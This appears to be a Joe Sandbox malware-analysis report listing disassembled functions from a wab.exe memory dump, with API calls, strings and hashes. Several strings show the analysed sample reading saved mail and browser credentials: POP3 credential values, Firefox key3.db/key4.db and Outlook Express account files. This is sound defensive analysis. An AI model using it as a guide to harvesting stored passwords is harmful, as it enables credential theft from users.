                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                  • String ID:
                                                                                  • API String ID: 2313361498-0
                                                                                  • Opcode ID: c48968d120a8350dafd0b05c892d8c8183d7a77208ced883aa7f681ff77c883e
                                                                                  • Instruction ID: 76b7db47255e00c5a16d586f34bfaf53fe76d4163934589152c5d70c184cfcdd
                                                                                  • Opcode Fuzzy Hash: c48968d120a8350dafd0b05c892d8c8183d7a77208ced883aa7f681ff77c883e
                                                                                  • Instruction Fuzzy Hash: AF31B3B1500605AFEB24AF69CC85E2AF7A8FF44354B00853FF55AE76A1D778EC408B94
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • GetClientRect.USER32(?,?), ref: 0040BB33
                                                                                  • GetWindowRect.USER32(?,?), ref: 0040BB49
                                                                                  • GetWindowRect.USER32(?,?), ref: 0040BB5C
                                                                                  • BeginDeferWindowPos.USER32(00000003), ref: 0040BB79
                                                                                  • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040BB96
                                                                                  • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040BBB6
                                                                                  • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040BBDD
                                                                                  • EndDeferWindowPos.USER32(?), ref: 0040BBE6
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Defer$Rect$BeginClient
                                                                                  • String ID:
                                                                                  • API String ID: 2126104762-0
                                                                                  • Opcode ID: 79eb62364e7a0dcd77e9d411930711777f01ecf57ddd8cbf010404b9f010fc5c
                                                                                  • Instruction ID: 10c9609a041f1aae696d54cc03c31aacdb7ad71aa251d7cd9d71944ddb51ea6f
                                                                                  • Opcode Fuzzy Hash: 79eb62364e7a0dcd77e9d411930711777f01ecf57ddd8cbf010404b9f010fc5c
                                                                                  • Instruction Fuzzy Hash: 4521C376A00209FFDB518FE8DD89FEEBBB9FB08700F144065FA55A2160C771AA519B24
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                                                                  • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                                                                  • GetDC.USER32(00000000), ref: 004072FB
                                                                                  • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                                                                                  • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                                                                                  • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                                                                  • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                                                                  • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                                                  • String ID:
                                                                                  • API String ID: 1999381814-0
                                                                                  • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                  • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                                                                                  • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                  • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcpymemset
                                                                                  • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                                                  • API String ID: 1297977491-3883738016
                                                                                  • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                  • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                                                                                  • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                  • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                                                                                    • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                                                                                    • Part of subcall function 00449550: memcpy.MSVCRT ref: 004495C8
                                                                                    • Part of subcall function 00449550: memcpy.MSVCRT ref: 00449616
                                                                                  • memcpy.MSVCRT ref: 0044972E
                                                                                  • memcpy.MSVCRT ref: 0044977B
                                                                                  • memcpy.MSVCRT ref: 004497F6
                                                                                    • Part of subcall function 00449260: memcpy.MSVCRT ref: 00449291
                                                                                    • Part of subcall function 00449260: memcpy.MSVCRT ref: 004492DD
                                                                                  • memcpy.MSVCRT ref: 00449846
                                                                                  • memcpy.MSVCRT ref: 00449887
                                                                                  • memcpy.MSVCRT ref: 004498B8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcpy$memset
                                                                                  • String ID: gj
                                                                                  • API String ID: 438689982-4203073231
                                                                                  • Opcode ID: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                  • Instruction ID: 4698d9130898d2a28bd34890c38a7d1df91d0c58a43dc6add7b2b2ec2d892026
                                                                                  • Opcode Fuzzy Hash: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                  • Instruction Fuzzy Hash: AB71C9B35083448BE310EF65D88069FB7E9BFD5344F050A2EE98997301E635DE09C796
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: __aulldvrm$__aullrem
                                                                                  • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                                                                                  • API String ID: 643879872-978417875
                                                                                  • Opcode ID: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                                  • Instruction ID: 9a4dcd4671c0eaaf570ced65c0a394ff57d12b60ca94b612a12fd923c93321e5
                                                                                  • Opcode Fuzzy Hash: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                                  • Instruction Fuzzy Hash: 09618C315083819FD7218F2886447ABBBE1AFC6704F18495FF8C4D7352D3B8C9998B4A
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcpymemset$strlen$_memicmp
                                                                                  • String ID: user_pref("
                                                                                  • API String ID: 765841271-2487180061
                                                                                  • Opcode ID: 90d77a8e642e16426f01af40e3455a1a28465a86fb6cd763409838de826d4489
                                                                                  • Instruction ID: f707cbd7524a382ab05823b92859e6f0e78dc23985d18c56f1e7f2c379abc130
                                                                                  • Opcode Fuzzy Hash: 90d77a8e642e16426f01af40e3455a1a28465a86fb6cd763409838de826d4489
                                                                                  • Instruction Fuzzy Hash: 0B4175769041189AD714DBA5DC81FDA77ACAF44314F1042BBA605B7181EA38AB49CFA8
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00405827
                                                                                  • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 00405840
                                                                                  • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 0040584D
                                                                                  • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405859
                                                                                  • memset.MSVCRT ref: 004058C3
                                                                                  • SendMessageA.USER32(?,00001019,?,?), ref: 004058F4
                                                                                  • SetFocus.USER32(?), ref: 00405976
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$FocusItemmemset
                                                                                  • String ID:
                                                                                  • API String ID: 4281309102-0
                                                                                  • Opcode ID: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                                                                  • Instruction ID: c72ca3e99ea405196032a5824f130882485a5617ada8e3d881518c79e7018221
                                                                                  • Opcode Fuzzy Hash: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                                                                  • Instruction Fuzzy Hash: 4241F8B5900209AFDB20DF94DC81EAEBBB9EF04358F1440AAE908B7291D7759E50DF94
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                    • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040AB7D,?,<item>), ref: 00406D4D
                                                                                  • _mbscat.MSVCRT ref: 0040A8FF
                                                                                  • sprintf.MSVCRT ref: 0040A921
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileWrite_mbscatsprintfstrlen
                                                                                  • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                  • API String ID: 1631269929-4153097237
                                                                                  • Opcode ID: 1edff87013eeafc9988ac017b7f9a6f14c9cca9b6a50fb5f6e60c21e7938a174
                                                                                  • Instruction ID: 568bce87a3ef0860ab630a318aded4c5cbf938598f8cce33e7c60ad495c5b4cb
                                                                                  • Opcode Fuzzy Hash: 1edff87013eeafc9988ac017b7f9a6f14c9cca9b6a50fb5f6e60c21e7938a174
                                                                                  • Instruction Fuzzy Hash: 88318F32900208AFDF15DF94C886EDE7BB5FF44314F11416AF911BB2A2D779A951CB84
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 0040810E
                                                                                    • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                    • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                    • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                    • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                                                                  • LocalFree.KERNEL32(?,?,?,?,?,00000000,7686EB20,?), ref: 004081B9
                                                                                    • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                    • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                    • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                                                                  • String ID: POP3_credentials$POP3_host$POP3_name
                                                                                  • API String ID: 524865279-2190619648
                                                                                  • Opcode ID: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                                                                                  • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                                                                                  • Opcode Fuzzy Hash: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                                                                                  • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: strlen$_mbscat_mbscpymemset
                                                                                  • String ID: key3.db$key4.db
                                                                                  • API String ID: 581844971-3557030128
                                                                                  • Opcode ID: 1b23ff19475b214b98e9218dd91c9d20610f24d325a1d0b0b24a5ae2e44b1aaa
                                                                                  • Instruction ID: ca97bc5828a50012869c36cbd7bca65918f6b78bc9695587552fe8d314e031cf
                                                                                  • Opcode Fuzzy Hash: 1b23ff19475b214b98e9218dd91c9d20610f24d325a1d0b0b24a5ae2e44b1aaa
                                                                                  • Instruction Fuzzy Hash: 4B210E3190811D6ADB10AA65DC41ECE77ACDB55318F1104BBF40DF60A1EE38DA958658
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ItemMenu$CountInfomemsetstrchr
                                                                                  • String ID: 0$6
                                                                                  • API String ID: 2300387033-3849865405
                                                                                  • Opcode ID: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                                                                  • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                                                                                  • Opcode Fuzzy Hash: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                                                                  • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcpystrlen$memsetsprintf
                                                                                  • String ID: %s (%s)
                                                                                  • API String ID: 3756086014-1363028141
                                                                                  • Opcode ID: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                                                                                  • Instruction ID: 78de9dcc32054867ea7a03e537ad908d86abacfb0a76549c44dff0155c32e653
                                                                                  • Opcode Fuzzy Hash: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                                                                                  • Instruction Fuzzy Hash: 741190B2800158AFDB21DF59CC45F99B7ACEF81308F0044A6EA58EB202D275FA15CB98
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: _mbscat$memsetsprintf
                                                                                  • String ID: %2.2X
                                                                                  • API String ID: 125969286-791839006
                                                                                  • Opcode ID: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                                                                  • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
                                                                                  • Opcode Fuzzy Hash: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                                                                  • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 004441C2
                                                                                  • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                                                                    • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                                                    • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                                                                    • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT ref: 00444075
                                                                                    • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                    • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                                                                    • Part of subcall function 00444059: memcpy.MSVCRT ref: 004440EB
                                                                                    • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT ref: 0044417E
                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 004441FC
                                                                                  • CloseHandle.KERNEL32(?), ref: 00444206
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                                                  • String ID: ACD
                                                                                  • API String ID: 1886237854-620537770
                                                                                  • Opcode ID: 14acd5922900dc7186521c5d2cf315890d497fea2d0f8e510365f992a0e5d2d7
                                                                                  • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                                                                                  • Opcode Fuzzy Hash: 14acd5922900dc7186521c5d2cf315890d497fea2d0f8e510365f992a0e5d2d7
                                                                                  • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 004091EC
                                                                                  • sprintf.MSVCRT ref: 00409201
                                                                                    • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                                                                    • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                    • Part of subcall function 0040929C: _mbscpy.MSVCRT ref: 004092FC
                                                                                  • SetWindowTextA.USER32(?,?), ref: 00409228
                                                                                  • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                                                                  • String ID: caption$dialog_%d
                                                                                  • API String ID: 2923679083-4161923789
                                                                                  • Opcode ID: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                                                                  • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                                                                                  • Opcode Fuzzy Hash: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                                                                  • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  • unknown error, xrefs: 004277B2
                                                                                  • abort due to ROLLBACK, xrefs: 00428781
                                                                                  • cannot open savepoint - SQL statements in progress, xrefs: 00426934
                                                                                  • cannot release savepoint - SQL statements in progress, xrefs: 00426A20
                                                                                  • no such savepoint: %s, xrefs: 00426A02
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcpy
                                                                                  • String ID: abort due to ROLLBACK$cannot open savepoint - SQL statements in progress$cannot release savepoint - SQL statements in progress$no such savepoint: %s$unknown error
                                                                                  • API String ID: 3510742995-3035234601
                                                                                  • Opcode ID: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                                                                                  • Instruction ID: e12ecffbdb4c009812b6d5dacdd15edfa1a81c90526927b9694010e916e04272
                                                                                  • Opcode Fuzzy Hash: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                                                                                  • Instruction Fuzzy Hash: AAC16C70A04626DFCB18CF69E584BAEBBB1BF48304F61406FE405A7351D778A990CF99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memset
                                                                                  • String ID: GROUP$H$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                  • API String ID: 2221118986-3608744896
                                                                                  • Opcode ID: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                                                                                  • Instruction ID: b2162d4513fc51f5474afcad34877166e8d447bb02b269bc62d34bb3a2ce53bd
                                                                                  • Opcode Fuzzy Hash: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                                                                                  • Instruction Fuzzy Hash: 43B157B16087118FC720CF29E580A1BB7E5FF88314F90495FE9998B751E738E841CB9A
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • memcpy.MSVCRT ref: 00442A5E
                                                                                    • Part of subcall function 0044257F: memcmp.MSVCRT ref: 004425C8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcmpmemcpy
                                                                                  • String ID: BINARY$NOCASE$RTRIM$main$temp
                                                                                  • API String ID: 1784268899-4153596280
                                                                                  • Opcode ID: ad1bb3be98cb8143327a8bba99d80b2cd1d250b2812bf04c93ad8184def5b6bb
                                                                                  • Instruction ID: 8c81c6e629260c6e32056db5335e0b2518b1498a844935eff1e92b421965135b
                                                                                  • Opcode Fuzzy Hash: ad1bb3be98cb8143327a8bba99d80b2cd1d250b2812bf04c93ad8184def5b6bb
                                                                                  • Instruction Fuzzy Hash: 8391F3B1A007009FE730EF25C981B5FBBE4AB44304F50492FF4569B392D7B9E9458B99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040FE66,00000000,?), ref: 004101E6
                                                                                  • memset.MSVCRT ref: 00410246
                                                                                  • memset.MSVCRT ref: 00410258
                                                                                    • Part of subcall function 004100CC: _mbscpy.MSVCRT ref: 004100F2
                                                                                  • memset.MSVCRT ref: 0041033F
                                                                                  • _mbscpy.MSVCRT ref: 00410364
                                                                                  • CloseHandle.KERNEL32(?,0040FE66,?), ref: 004103AE
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                                                                  • String ID:
                                                                                  • API String ID: 3974772901-0
                                                                                  • Opcode ID: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                                                                  • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                                                                                  • Opcode Fuzzy Hash: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                                                                  • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • wcslen.MSVCRT ref: 0044406C
                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 00444075
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                    • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433A0
                                                                                    • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433BE
                                                                                    • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433D9
                                                                                    • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443402
                                                                                    • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443426
                                                                                  • strlen.MSVCRT ref: 004440D1
                                                                                    • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT ref: 00443507
                                                                                    • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT ref: 00443516
                                                                                  • memcpy.MSVCRT ref: 004440EB
                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0044417E
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                                  • String ID:
                                                                                  • API String ID: 577244452-0
                                                                                  • Opcode ID: 20a3a8ba08b433d408bc1d9acc18c6cdba7529d035fe16c150172471e115ed75
                                                                                  • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                                                                  • Opcode Fuzzy Hash: 20a3a8ba08b433d408bc1d9acc18c6cdba7529d035fe16c150172471e115ed75
